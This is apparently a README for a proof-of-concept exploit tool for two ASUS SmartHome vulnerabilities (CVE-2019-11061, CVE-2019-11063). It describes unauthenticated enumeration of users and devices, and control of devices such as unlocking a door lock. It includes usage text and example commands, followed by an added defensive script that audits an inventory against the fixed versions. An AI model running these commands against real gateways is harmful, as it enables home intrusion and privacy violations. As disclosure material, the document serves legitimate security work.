CVE-2019-11061 : Broken access control in HG100
Affected products : ASUS SmartHome Gateway HG100 Firmware version < 4.00.09
CVE-2019-11063 : Broken access control in SmartHome app
Affected products : ASUS SmartHome Android APP version < 3.0.45_190701
An attacker on the same internal network as the HG100, or as a mobile device running the companion app (Android or iPhone), can send control requests to them.
- The attacker does not need any authentication to do the following:
  1. Get all user names that have been added to the HG100.
  2. Get information on all devices under the SmartHome Gateway (HG100).
  3. Control all controllable devices (e.g. DoorLock, Meter Plug ...) under the SmartHome Gateway.
- The following needs the password (4 to 6 digits, default: "0000"):
  1. Add users to the HG100.

```
usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list
```

```
usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list
```

Note: 2019/5/15 - ASUS released an update for the SmartHome app (3.0.42_190515) and Gateway (4.00.06) that added SSL to the HTTP service, but this vulnerability still exists. With this update, you need to specify the protocol when using the "cmd" argument. For example:

```
$ ./exploit.py cmd https://10.42.50.166:8083 -l
```

Scan mobile device (installed the companion APP for android or iPhone) exploitable port :
P.S. The -v option will list the users that have been added to the HG100.
or
Get all users that have been added to the HG100:
Note: use https://10.42.50.166:8083 for "cmd" argument.
For example:

```
$ ./exploit.py cmd https://10.42.50.166:8083 -u
```

Get all devices information under the SmartHome Gateway:
P.S. If the --user option is not set, the first user in the HG100 will be selected automatically (because no password is needed).
Control (unlock) the DoorLock.
P.S. The value 1028 comes from the output of the -l option (step 3).
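
For defenders taking stock of exposed installations, the following added example (not part of the original exploit.py or of any ASUS tooling) checks an inventory against the fixed versions listed at the top of this README. The product keys, host names and inventory rows are assumptions made for the illustration.

```python
import re

# Fixed releases exactly as stated in this README.
FIXED = {
    "hg100_firmware": "4.00.09",      # CVE-2019-11061
    "android_app": "3.0.45_190701",   # CVE-2019-11063
}

def parse_version(text):
    """Map '4.00.06' or '3.0.42_190515' to ((major, minor, patch), build)."""
    m = re.fullmatch(r"(\d+(?:\.\d+){0,2})(?:_(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    dotted = [int(p) for p in m.group(1).split(".")]
    dotted += [0] * (3 - len(dotted))  # pad '4.1' to (4, 1, 0)
    # A missing build suffix sorts lowest, so it is flagged rather than trusted.
    return tuple(dotted), int(m.group(2) or 0)

def is_affected(product, version):
    """True when version is older than the fixed release for product."""
    return parse_version(version) < parse_version(FIXED[product])

def audit(inventory):
    """Return (host, product, version, reason) for every row needing action."""
    findings = []
    for host, product, version in inventory:
        if product not in FIXED:
            findings.append((host, product, version, "no fixed version known"))
            continue
        try:
            if is_affected(product, version):
                reason = "update to >= " + FIXED[product]
                findings.append((host, product, version, reason))
        except ValueError:
            findings.append((host, product, version, "unparseable version"))
    return findings

# Constructed inventory; the host names are made up. Versions 4.00.06 and
# 3.0.42_190515 are the interim releases this README says are still vulnerable.
SAMPLE_INVENTORY = [
    ("gw-lobby", "hg100_firmware", "4.00.06"),
    ("gw-lab", "hg100_firmware", "4.00.09"),
    ("phone-01", "android_app", "3.0.42_190515"),
    ("phone-02", "android_app", "3.0.45_190701"),
    ("phone-03", "android_app", "beta"),
]

if __name__ == "__main__":
    for row in audit(SAMPLE_INVENTORY):
        print(*row, sep="\t")
```

Rows with a version string that cannot be parsed are reported for manual review instead of being treated as patched.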